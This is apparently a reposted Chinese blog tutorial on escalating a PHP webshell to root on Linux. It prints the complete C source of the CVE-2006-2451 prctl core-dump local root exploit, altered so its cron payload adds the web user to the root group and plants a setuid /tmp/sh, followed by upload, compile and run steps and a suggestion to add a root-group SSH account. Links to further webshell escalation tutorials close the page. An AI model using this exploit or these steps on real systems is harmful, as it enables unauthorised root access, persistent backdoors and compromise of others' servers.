Linux下WEBSHELL提权

转载 2012年03月30日 10:20:31

用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

前提:1、目标机上安装了GCC能编译源码

                 2、Kernel 2.6.x         (>= 2.6.13 && < 2.6.17.4)   

因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.

/**********溢出代码**************************/
/* Local r00t Exploit for:                                 */
/* Linux Kernel PRCTL Core Dump Handling                   */
/* ( BID 18874 / CVE-2006-2451 )                           */
/* Kernel 2.6.x        (>= 2.6.13 && < 2.6.17.4)                 */
/* By:                                                     */
/* - dreyer          <luna@aditel.org>         (main PoC code)         */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                        [ 10.Jul.2006 ]        */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *         root         cp /bin/sh /tmp/sh ; gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
          int child;
          struct rlimit corelimit;
          printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
          printf("By: dreyer & RoMaNSoFt\n");
          printf("[ 10.Jul.2006 ]\n\n");

          corelimit.rlim_cur = RLIM_INFINITY;
          corelimit.rlim_max = RLIM_INFINITY;
          setrlimit(RLIMIT_CORE, &corelimit);

          printf("[*] Creating Cron entry\n");

          if ( !( child = fork() )) {
              chdir("/etc/cron.d");
              prctl(PR_SET_DUMPABLE, 2);
              sleep(200);
              exit(1);
          }

          kill(child, SIGSEGV);

          printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
          sleep(62);

          printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
          system("/tmp/sh -p");
}

把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp (有时候需要执行几次才能成功).

用whoami命令看下你会发现你的WEBSHELL权限是ROOT.

char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~

相关文章推荐

linux webshell下信息收集和一些提权常用的命令

cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表. ifconfig {eth0 etc} – 查看网卡信息. ps aux – 查...

饭客webshell提权全套教程

  • 2013年07月08日 14:17
  • 78B
  • 下载

1-2webshell提权 绕过防火墙到3389

  • 2010年01月22日 23:09
  • 8.96MB
  • 下载

最全的Webshell提权方法总结

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有...
  • xysoul
  • xysoul
  • 2015年03月20日 15:42
  • 3825

提权漏洞集锦asp webshell

  • 2014年06月17日 08:21
  • 101KB
  • 下载

抓包改包拿webshell提权

  • 2013年07月30日 10:25
  • 8.69MB
  • 下载

最全的Webshell提权方法总结

在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有...

DB权限拿webshell_提权(语音)

  • 2011年11月28日 10:14
  • 17.68MB
  • 下载

一套webshell提权教程

前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西...
  • eldn__
  • eldn__
  • 2012年12月30日 10:20
  • 11957

虚拟主机封杀webshell提权

1.为了打造一个安全的虚拟主机,在asp SQL环境下,我们要做的是封杀ASP webshell.封杀serv-u提权漏洞和SQL注入的威胁 http://www.west263.cn/info...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Linux下WEBSHELL提权
举报原因:
原因补充:

(最多只允许输入30个字)